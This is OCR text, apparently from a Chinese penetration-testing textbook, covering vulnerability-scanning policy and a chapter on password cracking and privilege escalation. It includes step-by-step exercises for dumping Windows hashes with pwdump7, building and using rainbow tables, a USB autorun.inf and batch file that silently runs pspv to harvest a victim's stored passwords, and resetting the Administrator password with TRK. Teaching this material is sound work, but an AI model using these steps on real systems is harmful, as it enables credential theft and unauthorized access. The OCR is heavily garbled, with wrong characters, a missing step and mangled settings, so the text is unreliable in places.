应 该 谨慎 地 选择 所 希望 使 用 的 扫描 器 ， 并 规定 对 任何 其 他 漏洞 扫 拉 妖 的 使 用 都 必须 事前 进 
行 论 证 和 批准 。 

任何 扫描 工具 都 应 该 能 够 从 一 个 中 心 位 置 评估 信息 系统 ， 并 能 提供 修复 建议 。 它 还 必 
须 能 够 根据 漏洞 对 受害 单元 的 相对 影响 对 每 个 发 现 的 漏洞 设 定 其 严重 性 值 。 


7.3.1 对 现 有 设备 进行 定期 评 佑 


理想 的 情况 下 ， 应 要 求 每 个 部 门 都 按照 规范 的 时 间 表 对 其 联网 的 计算 设备 进行 评估 。 

每 个 部 门 至 少 应 该 依照 规定 的 时 间 表 (例如 每 月 或 每 季度 ) 执 行 完 全 认证 的 扫描 。 扫 描 
应 当 针对 评估 各 部 门 的 独特 需求 进行 裁剪 ， 且 运行 范围 应 覆盖 其 各 自 特 有 控制 区 域内 的 所 
有 资产 。 

例如 ， 可 要 求 每 月 对 下 列 网 络 和 计算 设备 进行 扫描 : 

@ 任何 已 知 包 含 敏感 数据 的 计算 设备 

@ 任何 必须 满足 特定 监管 要 求 ( 如 HIPAA) 的 计算 设备 

@ 任何 作为 用 以 构建 和 部 署 新 的 工作 站 /服务 器 的 基本 映像 的 文件 系统 映像 或 虚拟 机 

@ 任何 用 作 服 务 器 或 用 于 数据 存储 的 设备 
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@ 任何 网 络 基础 设施 设备 

除非 男 有 授权 ， 否 则 必须 使 用 经 批准 的 漏洞 扫描 工具 进行 扫描 。 

实施 扫描 时 (大 多 数 情况 下 ) 应 始终 考虑 到 业务 的 特有 需求 。 要 记 住 ， 漏洞 扫描 可 能 且 
必然 会 减 慢 其 正在 评估 的 网 络 、 设 备 或 应 用 程序 。 如 果 在 工作 时 段 内 进行 扫描 ， 应 注意 尽 
量 减 少 由 于 扫描 造成 的 可 能 干扰 。 扫 描 应 该 在 非 高 峰 时 段 进 行 ， 并 通过 附加 的 二 次 扫描 ， 
将 不 合作 的 或 因 关 机 而 需要 重新 扫描 的 客户 端 纳 入 扫描 。 

计算 设备 或 系统 管理 员 不 应 仅 为 了 通过 评估 而 对 网 络 计算 设备 进行 更 改 。 此 外 ， 只 要 
是 连接 网 络 的 设备 ， 都 不 应 进行 特殊 配置 屏蔽 漏洞 扫描 。 

联网 计算 设备 上 的 漏洞 应 根据 扫描 结果 和 业务 需求 加 以 处 理 。 记 住 ， 扫 描 引 擎 所 发 现 
的 漏洞 并 非 全 都 需要 处 理 。 


7.3.2 评估 新 的 系统 


在 完成 漏洞 评估 且 漏 洞 得 到 处 理 之 前 ， 任 何 新 的 系统 部 不 应 加 入 运营 当中 。 

应 当 要 求 各 部 门 在 以 下 时 机 实施 漏洞 评估 : 

@ 在 操作 系统 安装 及 修补 阶段 完成 时 

@ 在 完成 任何 由 供应 商 提供 或 内 部 开发 的 应 用 程序 的 安装 时 

@ 在 将 信息 系统 投入 运营 之 前 

@ 在 完成 用 于 部 车 于 多 个 设备 的 映像 或 模板 的 设计 时 

@ 在 供应 商 提供 的 信息 系统 交付 时 且 用 户 进行 验收 测试 之 前 ， 并 在 投入 运营 之 前 再 
@ 对 于 新 网 络 基 础 设施 设备 ， 在 找 机 测试 阶段 以 及 投入 运营 之 前 

在 上 述 每 次 脆弱 性 评估 完成 时 ， 必 须 记 录 并 修补 所 有 发 现 的 漏洞 。 


7.3.3 理解 扫 拍 目标 


各 部 门 不 应 对 不 党 其 直接 控制 的 系统 进行 侵入 陈 扫描 : 

@ 各 部 门 要 负责 确保 那些 由 供应 两 所 有 的 设备 在 可 能 危害 企业 的 漏洞 方面 受到 限制 。 

@ 供应 商 必 须 得 到 通知 ， 且 允许 其 在 进行 扫描 时 派出 工作 人 员 在 场 。 

@ 未 经 部 门 和 管理 层 的 明确 许可 ， 不 得 允许 供应 商 对 信息 系统 进行 扫描 。 

对 那些 疑似 在 网 络 上 引发 破坏 性 行为 的 联网 计算 设备 ， 应 通过 非 侵入 式 方 法 进行 扫 
描 ， 以 追查 破坏 行为 的 源头 。 


7.3.4 缓解 风险 


在 每 次 评估 结束 时 ， 各 部 门 应 编制 体现 以 下 内 容 的 文档 : 


第 / 草 实施 局 后 十 首 诗 时: 汉 


@ 所 有 发 现 的 漏洞 、 漏 洞 的 严重 性 ， 以 及 受 其 影响 的 信息 系统 

@ 对 于 每 个 已 发 现 的 漏洞 详细 说 明 如 何 修补 或 消除 该 漏洞 

@ 企业 漏洞 扫描 工具 生成 的 报告 ， 并 应 评估 该 报告 对 于 编制 该 文档 的 适合 性 

作为 年 度 安全 扫描 流程 的 一 部 分 ， 应 要 求 各 部 门将 根据 该 文档 开展 的 漏洞 扫描 与 修复 
工作 进行 记录 归档 。 

针对 发 现 的 漏洞 ， 应 基于 一 定 的 原则 采取 修复 和 /或 缓解 措施 ， 例 如 : 

@ 严重 漏洞 应 在 被 发 现 后 15 天 内 被 完全 解决 。 

@ 高 危 漏 洞 应 在 被 发 现 后 30 天 内 被 完全 解决 。 

e@ 中 和 危 漏 洞 应 在 被 发 现 后 60 天 内 被 完全 解决 。 

@ 低 危 漏洞 应 在 被 发 现 后 90 天 内 得 到 处 理 。 

当 漏 洞 被 利用 的 风险 得 到 完全 清除 ， 且 对 设备 的 后 续 扫 描 显 示 漏 洞 不 复 存 在 ， 则 可 以 
认为 漏洞 已 经 得 到 修复 。 通 常 ， 该 目标 可 通过 对 操作 系统 或 应 用 程序 打 补 丁 或 升级 软件 
实现 。 


7.4 可 执行 的 扫描 类 型 


当然 ， 在 实际 漏洞 中 可 能 用 到 的 各 种 扫描 方式 王 差 万 别 ， 但 本 书 在 此 还 是 列举 几 种 在 
行业 中 可 能 应 用 的 扫描 。 

认证 扫描 ”此 类 扫 拉 通过 对 特定 资质 凭据 进行 验证 来 判断 机 器 是 否 存在 漏 洞 ， 而 无 须 
进行 侵入 陈 扫 摘 。 

信息 系统 ”扫描 协同 运行 以 执行 一 组 业务 功能 的 软件 、 硬 件 和 接口 组 件 。 


内 部 机 密 ”扫描 中 具有 维持 特定 信息 仅 对 那些 得 到 授权 和 需要 了 解 该 信息 的 人 开放 的 


侵入 式 扫描 ”通过 主动 执行 已 知 的 漏洞 利用 手段 来 确定 漏洞 存在 的 一 种 扫描 方式 。 
联网 计算 设备 ”扫描 任何 连接 到 网 络 用 于 提供 访问 、 处 理 和 存储 信息 的 手段 的 计算 
设备 。 

网 络 基础 设施 设备 ”该 类 扫描 针对 提供 信息 传输 功能 的 设备 ， 如 路 由 器 、 交 换 机 、 防 
火 墙 和 桥接 设备 ， 不 包括 网 络 服务 器 和 工作 站 ， 除 非 这 些 服务 器 /工作 站 为 特定 的 提供 网 
络 传输 的 功能 服务 。 

部 门 “扫描 组 织 中 定义 的 一 个 负责 保护 某 个 给 定 的 信息 资产 的 单位 。 


7.5 本 痘 小 结 


漏洞 扫描 器 是 一 种 特殊 类 型 的 目 动 化 实用 工具 ， 用 于 识别 操作 系统 和 应 用 程序 中 的 弱 
点 。 这 是 通过 检查 编码 、 端 口 、 变 量 、banner 信 息 和 许多 其 他 可 能 存在 问题 的 领域 来 实现 
的 。 许 多 合法 用 户 使 用 漏洞 扫描 器 查找 是 人 否 存在 遭 到 成 功 攻击 的 可 能 性 ， 以 及 为 减 小 问题 
区 域 需要 进行 哪些 修复 工作 。 

虽然 漏洞 扫描 器 通常 用 于 检查 软件 应 用 程序 ， 但 它们 也 可 以 检查 整个 操作 环境 ， 包 括 
网 络 和 虚拟 机 。 漏 洞 扫 描 噩 是 为 了 寻找 特定 的 问题 而 设计 的 且 已 证 明 行 之 有 效 ， 但 同时 也 
存在 一 些 严 重 隐 患 : 如 果 没 有 发 现 问 题 ， 扫 描 峰 可 能 会 错误 地 报告 没有 问题 ， 因 此 最 好 对 
它们 的 扫描 结果 进行 补充 和 验证 。 


7.6“ 志 题 


. 何 为 漏洞 扫描 ? 

. 实施 扫描 并 将 其 自动 化 有 何 好 处 ? 
. 为 何 要 使 用 手动 扫描 ? 

. 何 为 认证 扫描 ? 

. 何 为 漏洞 ? 


破解 密码 


通过 之 前 的 扫描 、 信 息 收 集 和 枚 举 过 程 ， 现 已 收集 了 大 量 信息 ,例如 用 记名 、 组 、 密 
码 、 权 限 和 其 他 系统 细 市 。 接 下 来 将 利用 这 些 信息 ， 进 入 系统 并 获得 访问 权限 。 

这 个 阶段 代表 了 试图 进入 系统 以 破坏 系统 或 者 获取 茶 种 信息 的 时 间 点 。 需 要 记 住 的 
是 ， 该 过 程 是 相当 按部就班 的 ; 它 包 括 密 码 破解 、 提 升 权 限 、 执 行 应 用 程序 、 隐 藏 文件 、 
掩盖 六 迹 和 隐藏 证 据 。 本 章 将 介绍 破解 密码 。 


本 章 将 学 习 : 
久 区 分 良好 与 不 恨 的 密码 
人 5 破解 密码 
如” 提升 权限 


8.1 识别 强 密 


密码 是 世界 上 最 广泛 使 用 的 身份 验证 形式 ， 因 而 是 攻击 的 主要 目标 之 一 。 在 计算 机 系 
统 、 银 行 账户 、 自 动 取款 机 等 中 均 使 用 了 用 户 名 和 密码 。 对 一 个 渗透 测试 人 员 而 言 ， 破 解 
密码 的 能 力 是 一 项 必 备 技能 ， 因 为 它 是 一 种 有 效 的 获取 系统 访问 权 的 方式 。 

破解 密码 的 方法 生变 万 化， 意味 着 选择 也 多 种 多 样 。 可 以 利用 从 社会 工程 到 存储 缺 
陷 再 到 安全 性 低 的 身份 验证 服务 等 的 任何 手段 破解 密码 。 为 了 帮助 更 好 地 理解 破解 过 程 ， 
在 此 首先 分 析 一 个 强 密码 的 特征 。 密 码 应 当 易 于 记忆 ， 并 且 难 以 被 猜 到 或 破解 。 虽 然 这 两 
个 目标 看 似 自 相 矛盾 ， 但 实际 上 是 相辅相成 的 。 然 而 ， 有 一 个 问题 是 ， 许 多 人 在 寻找 “ 完 
美 ” 的 密码 时 ， 会 选择 一 些 容易 记忆 但 是 也 易于 被 猪 到 的 密码 。 

下 面 是 一 些 容易 被 破解 的 密码 的 例子 。 
包含 字母 、 特 殊 字符 和 数字 的 密码 : stud@52 
只 包含 数字 的 密码 : 23698217 
只 包含 特 殊 字符 的 密码 ，&*#(@1(%) 
包含 字母 和 数字 的 密码 : meetl23 
只 包含 大 写 或 小 写 的 密码 : POTHMYDE 
只 包含 字母 和 特殊 字符 的 密码 : rex@&ba 


洽 秀 则 试 入 门 实战 


@ 只 包含 特殊 字符 和 数字 的 密码 : 123(@$4 

@ 含有 11 个 或 更 少 字符 的 密码 

你 可 能 已 经 知晓 这 个 列表 中 的 一 些 或 全 部 规则 ， 因 为 公司 在 出 于 任何 原因 设置 任何 种 
类 密码 时 ， 往 往 使 用 它们 作为 推荐 指南 。 请 记 住 ， 具 有 上 述 列表 中 任意 一 个 特点 的 密码 都 
不 安全 ， 具 有 不 止 一 个 特点 的 密码 则 更 不 安全 。 


8.2 ”选择 一 种 密码 破解 


可 使 用 很 多 技术 找 出 或 恢复 密码 ， 虽 然 各 种 方法 间 都 有 少许 差别 ， 但 它们 都 能 获取 
密码 。 

子 典 攻击 这 种 类 型 的 攻击 采用 了 密码 破解 应 用 程序 的 形式 ， 其 中 使 用 了 一 个 文本 
文档 ， 预 先 ( 或 者 手动 ) 加 载 一 个 可 能 密码 的 通用 列表 。 应 用 程序 将 和 尝试 通过 使 用 该 列表 
中 的 单词 来 恢复 密码 。 该 列表 令 攻 击 者 可 以 使 用 那些 常用 作 密 码 的 单词 先拔头筹 ， 有 助 
于 加 快 破解 密码 的 过 程 。 这 些 列表 可 以 从 许多 网 站 免费 下 载 得 到 ， 其 中 有 的 列表 含有 数 
百 万 单词 。 

暴力 攻击 ”在 这 种 类 型 的 攻击 中 ， 将 尝试 所 有 字符 的 可 能 组 合 方式 直到 找到 正确 密 
码 。 虽 然 这 种 攻击 可 能 成 功 ， 但 许多 现代 系统 都 采用 了 诸如 账 己 锁定 和 错误 登录 计数 ( 称 
为 阐 值 ) 等 技术 ， 以 防止 该 攻击 。 错 误 次 数 通 第 限制 为 3~$ 次 。 超 过 该 限制 值 后 ， 将 锁定 账 
户 并 要 求 管理 员 重新 设置 账户 密码 。 

竟 合 攻击 ”这 种 密码 攻击 属于 字典 攻击 ， 但 在 流程 中 附加 了 其 他 一 些 步骤 。 例 如 ， 它 
可 以 使 用 字典 攻击 ， 但 在 字典 密码 的 最 后 加 上 通用 的 密码 组 成 部 分 (如 1 或 !)。 

除了 这 些 技术 之 外 ， 还 有 4 种 攻击 类 型 ， 每 种 攻击 方式 都 有 不 同 的 恢复 和 发 现 密码 的 
方法 。 通 第 ， 可 将 各 种 密码 破解 技术 进一步 细 分 为 以 下 类 型 : 

被 动 攻击 ”那些 只 对 网 络 进行 监听 的 攻击 归 为 此 类 。 攻 击 实现 方法 之 一 是 措 接 连 入 网 
络 ， 并 使 用 称 为 嗅 探 器 的 技术 分 析 数 据 流 量 以 寻找 密码 。 

主动 在 线 攻击 ”这 种 类 型 的 攻击 比 被 动 攻击 更 具 侵略 性 ， 其 流程 需要 更 深入 地 接触 目 
标 。 这 种 形式 的 攻击 意味 着 为 破解 密码 而 更 主动 地 攻击 受害 者 。 

离线 攻击 ”这 种 类 型 的 攻击 设计 针对 的 不 是 密码 本 身 的 弱点 ， 而 是 密码 在 系统 中 的 存 
储 方式 。 由 于 密码 必须 以 茶 种 格式 和 存储， 攻击 者 需要 设法 获取 其 凭据 。 

非 技 术 性 攻击 ”这 种 类 型 的 攻击 也 称 为 非 电子 攻击 ， 它 们 将 攻击 转移 到 现实 世界 中 。 
通 疝 该 类 攻击 的 明确 表现 形式 是 社会 工程 学 ， 也 即 操纵 人 心 。 

仔细 研究 这 些 攻 击 可 以 锻 炬 你 的 铜 察 力 ， 在 今后 会 用 到 。 
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8.3 ”实施 被 动 在 线 攻 击 


被 动 攻击 是 指 攻击 者 采取 “和 守 株 符 爸 ” 的 方法 进行 的 攻击 。 这 种 攻击 的 整体 效果 在 一 
定 程度 上 取决 于 攻击 者 的 静默 程度 以 及 密码 系统 目 身 的 脆弱 程度 。 


8.3.1 网 络 嗅 探 和 效 据 包 分 析 


稍 后 本 书 将 更 详细 地 介绍 数据 包 串 探 嚣 ， 但 在 此 作为 获取 密码 的 一 种 方法 先 作 简单 介 
绍 。 嗅 探 器 是 一 种 可 用 于 监听 和 分 析 流 经 网 络 的 信息 (或 称 流 量 ) 的 软件 或 硬件 。 它 通常 用 
于 进行 网 络 诊断 ， 但 也 可 以 用 于 更 具 恶 意 的 目的 ， 隐 秘 监听 网 络 活动 。 有 一 种 网 络 流量 虽 
探 器 如 图 8.1 所 示 。 
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图 8.1 ”Wireshark 数 据 包 嗅 探 器 


嗅 探 如 何 得 以 成 为 一 种 有 效 的 信息 收集 方式 ? 这 往往 是 因为 人 们 使 用 了 不 安全 协议 ， 
如 FTP、Telnet、rlogin、SMTP 和 POP3 等 。 在 许多 情况 下 ， 这 些 协议 正 被 逐步 淘汰 ， 要 人 么 
通过 其 他 安全 手段 (如 SSHJ 对 其 进行 增强 。 然 而 无 论 采 用 哪 种 方式 ， 仍 然 有 许多 网 络 采用 
可 能 以 纯 文 本 格式 保存 密码 的 遗留 协议 ， 易 于 成 为 攻击 者 的 目标 。 

有 趣 的 是 ， 易 受 攻 击 的 不 仅仅 是 旧 协 议 ， 一 些 新 协议 也 是 如 此 。 例 如 ，IP 语 音 (VolIP) 
所 使 用 的 协议 已 经 被 证 明 易 受 嗅 探 攻击 。 在 某 些 情况 下 ， 嗅 探 器 可 以 截获 并 解码 通话 。 
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8.3.2 中间人 攻击 


这 种 类 型 的 攻击 发 生 在 不 同 双方 相互 通信 而 第 三 方 进行 监 昕 时。 在 第 三 方 开始 监听 
后 ， 他 们 可 以 选择 接管 通信 的 原始 双方 中 一 方 的 通信 或 者 选择 鼻 改 双方 交流 的 信息 。 虽 然 
监听 行为 是 被 动 的 ， 但 从 攻击 者 改变 数据 包 内 容 的 那 一 刻 起 ， 就 迅速 成 为 一 种 主动 攻击 。 
中 间 人 攻击 的 原理 如 图 8.2 所 示 。 


中 间 人 攻击 


原始 连接 


EL 
中 间 人 、 钓 鱼 者 
或 匿名 代理 
图 8.2 ”中 间 人 攻击 
这 种 类 型 的 攻击 特别 有 用 ， 其 利用 的 同样 是 那些 易 被 嗅 探 的 协议 。 诸 如 Telnet 和 FTP 
之 类 协议 特别 容易 受到 此 类 攻击 ， 部 分 原因 在 于 这 些 协议 明文 传输 身份 验证 数据 (用 户 名 
和 密码 )。 


8.4 ”实施 主动 在 线 攻 击 


与 “被 动 ”一 词 相对 的 是 “主动 ”， 在 此 讨论 的 则 是 主动 在 线 攻 击 。 需 要 与 系统 直接 
交互 以 破解 密码 的 攻击 归 入 此 类 。 此 类 攻击 在 许多 情况 下 具备 速度 更 快 的 优势 ， 但 它们 也 
有 隐蔽 性 不 强 而 容易 被 监测 到 的 缺点 。 


8.4.1 密码 猜测 


虽然 密码 猜测 无 疑 技 术 含 量 不 高 ， 但 却 是 一 种 可 行 且 具备 一 定 效 率 的 获取 密码 的 方 
式 。 在 此 攻击 过 程 中 ， 攻 击 者 尝试 通过 软件 获取 密码 ， 该 软件 采用 基于 一 个 导入 应 用 程序 
中 的 列表 测试 密码 的 设计 。 软 件 会 和 尝试 各 种 密码 变 体 ， 包 括 大 小 写 变 换 、 蔡 换 、 数 字 蔡 换 
和 大 小 写 反 转 。 
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8.4.2 ”恶意 软件 


恶意 软件 是 一 种 非 第 有 效 的 攻陷 系统 来 获取 密码 和 其 他 数据 的 手段 。 具 体 而 言 ， 诸 如 
木马 、 间 谍 软 件 和 密 钥 记 录 融 等 恶意 软件 已 证 明 行 之 有 效 ， 可 用 于 收集 各 种 信息 。 

恶意 软件 的 一 种 形式 是 键盘 咒 探 或 键盘 记录 ， 它 能 在 用 户 输 入 密码 时 截获 之 。 这 种 攻 
击 可 以 基于 硬件 或 软件 实施 ， 并 且 在 过 程 中 可 能 获得 各 种 信息 ， 而 不 限于 密码 。 


8.5 ”实施 离线 攻击 


离线 攻击 是 一 种 不 仅 有 效 且 可 能 难以 检测 的 攻击 形式 。 离 线 攻 击 依赖 于 攻击 方 在 不 直 
接 接 触目 标本 身 的 前 提 下 获取 密码 的 能 力 。 


练习 8.1: 获取 哈 硕 值 
下 面 练习 一 次 离线 攻击 ， 从 系统 中 提取 一 个 哈 硕 值 。 
(1) 打开 命令 提示 符 。 
(2) 输入 pwdump7.exe 显示 系统 上 的 哈 希 值 。 
(3) 输入 pwdump7 > CA\hash txt。 
(4) 按 回 车 键 
(5) 使 用 记事 本 ， 浏 览 到 C 僵 驱动 硕 并 打开 hash_txt 文 件 查 看 其 中 的 哈 硕 值 。 


预计 算 的 哈 希 值 (又 称 彩 虹 表 ) 


一 种 较 新 的 、 较 先进 的 高 级 离线 攻击 技术 是 通过 预计 算 的 哈 希 值 (通常 称 为 彩虹 表 ) 进 
行 攻击 。 彩 虹 表 是 一 个 过 程 的 最 终结 果 ， 在 该 过 程 中 生成 了 一 定 范围 内 的 所 有 可 能 的 字符 
组 合 。 在 生成 所 有 结果 后 ， 攻 击 方 即 可 通过 捕获 在 网 络 上 传输 的 密码 的 哈 希 值 ， 并 将 其 与 
生成 的 哈 希 值 表 进 行 比较 ， 快 速 匹配 并 获得 原 密 码 。 创 建 彩虹 表 的 工具 如 图 8.3 所 示 。 

彩虹 表 的 主要 缺点 是 它们 需要 大 量 时 间 生 成 ， 因 此 它 不 是 一 种 可 以 无 顷 预 先 设置 即 实 
行 的 攻击 方式 。 彩 虹 表 的 另 一 个 缺点 是 无 法 破解 长 度 无 限 的 密码 ， 因 为 生成 的 密码 的 长 度 
越 长 ， 越 耗费 时 间 ( 随 着 密码 长 度 增加 ， 生 成 的 彩虹 表 就 愈加 复杂 )。 彩 虹 表 的 一 个 示例 片 
段 如 图 8.4 所 示 。 
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图 8.3 创建 彩虹 表 的 应 用 程序 


g CWindows\system32\cmd.exe 


图 8.4 ”彩虹 表示 例 


制作 彩虹 表 


下 面 将 创建 一 个 彩虹 表 以 学 习 该 流程 。 在 大 多 数 情况 下 ， 甚 至 可 能 不 需要 自行 


创建 彩虹 表 ， 而 可 以 下 载 一 个 。 ey 在 新 的 Windows 版 本 中 ， 可 能 需要 使 用 管理 员 


权限 


运行 该 应 用 程序 。 

(1) 启动 winrtgen.exe 工 具 。 

(2) 单 击 Add Table 按 钮 。 

(3) 在 Rainbow Table Properties 窗 口中 ， 从 Hash 下 拉 列 表 中 选择 NTLM。 

(4) 设置 Minimum mt ，Maximum Length 为 9，Chain Count 为 4 000 000。 

(5) 从 Charset 下 拉 列 表 4 中 选 

(6) 单 击 OK 按 钮 。 

Windows 将 开始 创建 彩虹 表 。 注 意 ， 创 建 实 际 的 彩虹 表 文 件 可 能 需要 花费 大 量 时 
具体 取决 于 计算 机 的 速度 和 所 选择 的 设置 


择 loweralpha。 
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练习 8.1 和 练习 8.2 完 成 了 离线 密码 攻击 过 程 的 两 个 重要 步骤 。 练 习 8.1 从 目标 系统 中 
提取 密码 哈 希 值 ， 练习 8.2 创 建 一 个 可 能 存在 匹配 密码 的 彩虹 表 。 如 果 匹 配 ， 攻 击 就 成 功 
了 。 执 行 完 这 两 个 步 邓 后 ， 就 必须 着 手 获取 密码 。 


练习 8.3: 用 彩虹 表 破 解密 人 码 

在 创建 彩虹 表 后 ， 即 可 用 它 依 据 pwdump 和 WinRTGen 中 的 信息 来 恢复 密码 。 

(1) 双击 rcrack egui.exe。 

(2) 单 击 File | Add Hash， 打 开 Add Hash 和 窗口 。 

(3) 如 果 之 前 执行 了 pwdump 操 作 ， 即 可 打开 创建 的 文本 文件 ， 并 在 此 复制 和 烙 
贴 文件 中 的 哈 希 值 。 

(4) 单 击 OK 按钮 。 

(5) 从 菜单 栏 中 选择 Rainbow Table， 然 后 单 击 Search Rainbow Table。 如 果 在 之 前 
执行 了 WinRTGen 生 成 彩虹 表 ， 即 可 在 此 使 用 该 彩虹 表 。 

(6) 单 击 Open 按 钮 。 


虽然 彩虹 表 是 一 种 有 效 的 密码 破译 手段 ， 但 它 也 不 是 战 无 不 胜 的 。 这 意味 着 应 在 哈 希 
操作 前 先 对 密码 进行 “加 盐 ”。 

“加 盐 ” 是 指 在 哈 希 操作 前 先 添加 伪 随 机 值 以 产生 不 同 且 唯一 的 输出 的 一 种 方法 。 将 
“ 盐 值 ”添加 到 原始 密码 中 ， 然 后 进行 哈 希 。 彩 虹 表 执行 的 是 一 种 称 为 密码 分 析 的 方法 。 
为 了 阻止 这 种 分 析 ， 可 以 通过 加 盐 方法 增加 随机 性 ， 加 大 分 析 的 难度 。 


8.6 ”使 用 非 技 术 性 方法 


应 当 记 住 ， 获 取 密 码 并 不 意味 看 总 是 需要 主动 去 破解 密码 一 一 还 有 其 他 的 方法 。 


8.6.1 默认 密码 


虽然 称 不 上 一 种 真正 的 方法 ， 但 使 用 默认 密码 也 是 获取 密码 的 一 种 途径 。 默 认 密 码 是 
由 设备 或 软件 的 制造 商 在 开发 时 设置 的 。 当 用 户 收 到 设备 时 ， 应 当 更 改 密码 。 问 题 是 ， 并 
不 是 所 有 用 户 都 会 这 么 做 ， 导 致 有 时 仍 保留 默认 密码 。 以 下 是 一 些 收集 默认 密码 的 网 站 : 
https://cirt.net 


www.deftaultpassword.us 
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bp 保存 这 个 默认 密码 网 www.passwordsdatabase.com 
站 的 列表 可 能 会 很 方便 ; 和 

使 用 默认 密码 是 一 种 进入 http://open-sez.me 

很 多 系统 的 简单 方法 ， 在 www.routerpasswords.com 
枚 淮 过 程 中 可 能 会 笠 试 使 www.fortypoundhead.com 

用 默认 密码 。 


8.6.2 ”猜测 


虽然 这 几乎 是 技术 含量 最 低 的 一 种 攻击 方式 ， 但 却 确实 有 效 。 人 工 猜测 密码 可 能 很 有 
成 效 ， 尤 其 是 在 那些 不 具备 或 未 实施 密码 策略 的 环境 中 。 

猜测 密码 通常 可 按照 以 下 步骤 进行 ， 

(1) 确定 一 个 有 效 的 用 户 。 

(2) 确定 一 个 可 能 的 密码 列表 。 

(3) 将 可 能 的 密码 按 可 能 性 进行 排序 。 

(4) 尝试 密码 ， 直 到 获得 访问 权 或 穷尽 所 有 可 能 密码 。 


8.6.3 使 用 闪存 驱动 器 寄 取 密码 


内 存 驱动 器 是 另 一 种 从 系统 中 窃取 密码 或 其 他 数据 的 方法 。 简 而 言 之 ， 该 攻击 过 程 是 
在 闪存 驱动 器 插入 目标 系统 之 前 在 其 中 嵌入 一 个 脚本 或 程序 (或 者 二 者 兼 有 )。 由 于 许多 用 户 
在 他 们 的 本 地 计算 机 上 存储 应 用 程序 和 网 站 的 密码 ， 这 些 密码 信息 可 以 用 脚本 轻易 获取 。 


练习 8.4: 使 用 pspv 
在 这 个 练习 中 ， 本 书 将 尝试 使 用 NirSoft 的 pspv 实 用 程序 从 系统 中 提取 密码 。 
pspv.exe 是 一 个 查看 受 保护 存储 中 的 密码 的 程序 ， 它 可 以 显示 Windows 系 统 中 存 
储 的 包含 于 Intemet Explorer 或 其 他 微软 应 用 程序 中 的 密码 。 该 程序 在 Windows Vista 和 
Windows 7 上 可 确保 工作 ， 在 Windows 8 和 更 高 版 本 的 系统 上 成 功率 则 受到 限制 。 
(1) 将 该 实用 程序 复制 到 USB 驱 动 硕 。 
(2) 使 用 记事 本 创建 一 个 名 为 autorun.inf 的 文件 ， 其 内 容 如 下 : 
[autorun] 


open = launch.bat 


(4) 打开 记事 本 创建 名 为 launch.bat 的 文件 ， 并 输入 以 下 命令 行 : 


Start pspv.exe /s passwords .txt 
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(5) 将 launch.bat 保 存 到 闪存 盘 中 。 
此 时 该 USB 驱 动 妖 即 可 插入 目标 计算 机 中 用 于 攻击 。 在 插入 受害 PC 中 后 ，pspyv. 
exe 将 运行 并 提取 密码 ， 然 后 将 其 存 入 可 以 在 记事 本 中 打开 的 passwords.txt 文 件 中 。 


注意 这 种 攻击 需要 确保 攻击 成 功 的 其 他 条 件 : 物理 访问 。 如 果 可 对 系统 进行 物理 访 
问 ， 就 可 以 实施 多 种 攻击 ，USB 形 式 的 攻击 不 过 是 一 个 开始 。 无 警惕 的 用 户 很 可 能 会 出 于 
好 奇 而 将 USB 设 备 插 入 电脑 。 

另 一 种 通过 USB 接 口 雳 取 密 码 的 方法 是 使 用 一 种 来 自 Haks 的 名 为 “USB 橡 皮 鸭 
(Rubber Ducky)” 的 设备 。 该 设备 可 以 插入 USB 接 口 ， 但 是 系统 识别 到 的 是 一 个 键盘 而 不 
是 一 个 存储 设备 。 由 于 大 部 分 操作 系统 不 会 阻止 安装 人 机 接口 设备 ， 因 此 该 设备 将 被 识 
别 ， 可 配置 其 上 的 各 种 脚本 执行 任意 类 型 操作 。USB 橡 皮 鸭 如 图 8.$ 所 示 。 


图 8.5 USB 橡皮 鸭 及 其 配套 附件 


8.7 ”提升 权限 


在 攻陷 一 个 账户 并 破解 其 密码 后 ， 下 一 步 就 是 利用 新 获取 的 该 账户 的 权限 。 此 时 就 是 
提升 权限 ( 提 权 ) 的 用 武之 地 。 提 权 是 指 将 获得 的 访问 权限 增加 到 一 个 更 高 的 可 以 执行 更 多 
操作 的 级 别 。 实 际 情况 是 ， 可 访问 的 账户 通常 会 是 一 个 权限 等 级 较 低 的 账户 ， 因 此 可 访问 
的 东西 不 多 。 由 于 有 很 大 可 能 获取 一 个 权限 较 低 的 账户 ， 因 此 需要 以 茶 种 方式 提高 它 的 
权限 。 

权限 提升 可 以 采用 以 下 两 种 方式 之 一 : 水 平 提升 和 垂直 提升 。 垂 直 提 升 是 指 攻 陷 账户 
时 将 该 账户 的 特权 提升 到 一 个 更 高 的 级 别 。 水 平 提 升 是 指 攻陷 账户 时 使 用 第 一 个 账户 的 能 
力 攻陷 为 一 个 更 高 权限 的 账户 。 

每 种 操作 系统 都 包括 许多 预先 设置 和 安装 的 账户 。 在 Windows 操 作 系统 中 ， 诸 如 管理 
员 和 来 宾 这 样 的 用 户 已 内 置 在 所 有 系统 中 。 鉴 于 从 操作 系统 中 提取 账户 信息 的 操作 十 分 简 
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单 ， 因 此 必须 采取 额外 措施 以 确保 账户 的 安全 。 

权限 提升 的 一 种 方法 是 找到 一 个 具有 所 需 访问 权限 的 账户 ， 然 后 更 改 密码 。 有 几 种 工 
具 具 备 这 种 能 力 ， 包 括 下 列 这 些 : 

@@ Active(® Password Changer 

@ Trinity Rescue Kit 

@ 上 RD Commander 

@@ Windows Recovery Envlronment(VWInRE) 

@ 上 all LInUX 

®@ Parrot OS 

这 些 工具 中 的 其 中 之 一 Trinity Rescue Kit(TRK) 是 一 个 专 为 在 CD 或 闪存 驱动 器 上 运行 
设计 的 Linux 发 行 版 。 它 用 于 恢复 和 修复 Windows 和 Linux 系 统 ， 同 时 也 可 执行 一 些 系统 功 
EE， 如 重 置 密码 和 提升 权限 等 。 运 行 TRK 之 后 ， 即 可 通过 执行 一 系列 简单 的 命令 重 置 账户 

可 按 以 下 步 又， 使 用 TRK 更 改 Windows 系 统 中 Administrator 账 户 的 密码 。 

(1) 在 命令 行 中 输入 以 下 命令 : 

winpass -u Administrator 

winpass 命 令 会 显示 类 似 如 下 的 信息 : 


Searching and mounting all file system on local machine 
Windows NT/2K/XP 1installation(s) found in: 

:1]: /hdal/Windows 

Make your choice or gq" to quit [1]: 


(2) 输入 1 或 (在 存在 多 个 安装 时 ) 输 入 Windows 文 件 夹 的 位 置 。 


PP ”里 然 Trinity Rescue Kit nd | : . 

是 Se dows 8 以 下 版 本 (4) 输入 新 的 密码 或 按 TRK 的 建议 将 密码 设置 为 空 。 
设计 的 ， 但 也 应 可 对 更 新 (5) 此 时 将 显示 确认 消息 : Do you really wish to change 
的 版 本 有 效 。 但 是 ， 仍 建 ” it。 按 Y 并 按 回 车 键 。 

